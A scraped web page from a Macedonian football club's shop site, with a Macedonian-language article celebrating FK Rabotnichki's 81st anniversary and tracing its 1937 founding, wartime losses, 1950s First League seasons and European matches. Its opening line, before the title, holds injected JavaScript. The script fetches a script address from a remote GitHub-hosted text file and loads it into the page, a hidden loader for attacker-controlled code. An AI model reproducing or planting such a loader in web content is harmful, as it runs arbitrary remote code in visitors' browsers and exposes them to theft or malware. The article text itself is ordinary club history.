;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » 81 година – ФК Работнички… „Херојот од Дебар маало“ слави нов роденден!
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

81 година – ФК Работнички… „Херојот од Дебар маало“ слави нов роденден!

На денешен ден во 1937 година почнува официјално да живее еден од најстарите фудбалски клубови во Македонија – ФК Работнички. „Херојот од Дебар маало“, како што ќе го добие својот препознатлив прекар во годините, го стартува во 1937 година својот почеток како еден од најголемите фудбалски колективи во историјата на македонскиот фудбал па денеска го слави својот 81-ви роденден!

  • Формирањето во 1937 година и почетоците на натпреварувањето

Согледувајќи ја важноста на фудбалската игра која во годините пред Втората светска војна зафаќа се поголем замав на Балканските простори, а веднаш и по првото учество на поранешна Југославија на СП во Уругвај, Дане Крапчев ја носи идејата за формирање на клуб кој би имал централно место во животот на Дебар Маало. Младите од Дебар маало во 1935 и 1936 години максимално активно се обидувале да регистрираат фудбалски клуб, затоа што не наидувале на разбирање од тогашната власт. Во тоа време власта не била расположена да разговара за ваквите предлози бидејќи во Дебар Маало имала свое здружение наречено „Хумано-културно друштво Дебар Маало“ преку кое режимот сакал да ја истакне својата „грижа“ за сиромашната работничка класа… Но, неговата активност згаснува кон крајот на 1936 година. Токму тоа во пролетта 1937 година го отвора прашањето за формирање на организиран фудбалски клуб, па на предлог на Дане Крапчев, кој го дава и името, во октомври е формиран ФК Работнички, пред се и затоа што основачите произлегувале од работнички семејства, од работничка средина… Токму поради тоа, ова име е едногласно е прифатено како и црвената боја која ќе биде симболот на тимот од Дебар маало до денес.

Основачкото собрание на клубот е одржано на 4. октомври 1937 година во кафеаната „Нада“ на Трајко Георгиевски – Ќорот. На собранието присуствувале околу 40 лица меѓу кои биле играчите, а имало и некои видни граѓани, како и претставници на други фудбалски клубови од градот. Плановите за иднината на клубот ги претставил кандидатот за претседател Александар Танев.

Натпреварувачката 1938/39 е првата официјална сезона на ФК Работнички. Од петте екипи во првенството го освојува четвртото место со само еден бод помалку од второпласираната Слога и третопласираниот Рапид. Првенството во сезоната 1940/41 не го доживува својот крај, а во оние малку натпревари кои ги одиграл Работнички забележал една победа, две нерешени и еден пораз. Поради почетокот на Втората светска војна првенството не може да заврши… А дел од првотимците на клубот, како Благоја Мисајловски, Михе Ивановски, Стефан Стефановиќ – Треф, Василие Терзиќ – Кореа, Никола Таневски и други се приклучиле кон активностите на партизанското движење во Македонија, па во такви околности за нив фудбалот станал второстепена активност.

  • Зошто Херојот од Дебар маало!?

Многумина во Македонија и денес се прашуваат од каде прекарот „Херојот на Дебар маало“ за Работнички. Сето тоа е поради фактот дека Работнички дал најмногу жртви од сите спортски колективи на овие простори за време на Втората светска војна, како учесници во НОБ на Македонија. Според податоците со кои се располага и сеќавањата на многу членови на клубот, во Народноослободителната борба на југословенските народи, загинале 14 функционери и спортисти на Работнички. Меѓутоа, се претпоставува дека овој број е далеку поголем бидејќи за некои од предвоените членови на клубот кои по окупацијата го напуштиле Скопје постоеле информации дека се вклучени во партизанските единици во другите југословенски држави, но за жал нивната трага се губи засекогаш. Токму поради тоа голем број спортски работници од Скопје и од Македонија сами во тие години го проникнале прекарот кој засекогаш ќе остане за ФК Работнички како колектив – Херојот од Дебар маало!

  • Незаборавната генерација од 1952/53 година

Фудбалерите на Работнички од Скопје, покрај Граѓански (пред Втората светска војна), Победа (Скопје), Вардар, Тетекс и Пелистер е дел од само шест екипи кои во историјата на Македонија играле во Првата лига на поранешна Југославија. Работнички играше и во Втората лига во Југославија, а со години се натпреваруваше во Првата лига на Македонија.

По Втората светска војна клубот учествуваше во првото првенство на Првата лига на Македонија 1946 година заедно со Македонија и Победа од Скопје, Гоце Делчев (Прилеп), 11 Октовмри (Куманово) и Пелистер (Битола) кога го освои четвртото место. Шампион беше екипата на Победа.

За првпат Работнички стана член на најсилната Прва лига на поранешна Југославија во сезоната 1952 година, обезбедувајчи место откако претходната сезона заврши на второто место во Втората сојузна лига на Југославија. Тој тим од 1952 година се смета за еден од најдобрите во историјата на Работнички: Тодор Балевски-Велф, Кире Гичевски-Гинда, Урош Петровски, Блажо Мојсов, Божо Вучиновски, Војче Димитровски, Шпире Петровски, Цветко Бачваровски, Кирче Стојановски, Христо Христовски-Мулац и Атанас Радевски-Брсјак.

По вторпат во друштвото на најдобрите клубови во поранешна Југославија, Работнички се најде во сезоната 1953/54.

  • Беспрекорен македонски репрезент на европската сцена

По осамостојувањето на Македонија, ФК Работнички е еден од најдобрите домашни клубови без конкуренција. Со освоени четири шампионски титули и четири титули во Купот на Македонија е вброен во најдобрите македонски фудбалски колективи.

Но, тоа што овие 25 години од македонскиот самостоен фудбал го издвојува „Херојот од Дебар маало“ се сигурно извонредните настапи на европската сцена.

Дуелите против Дебрецин, Болтон, Ливерпул, Лацио, Трабзонспор… закогаш ќе останат запаметени во историјата не само на Работнички, но и на македонскиот фудбал воопшто. Исто како што засекогаш ќе остане и датумот 4. октомври 1937 како еден од најзначајните за фудбалот во Македонија!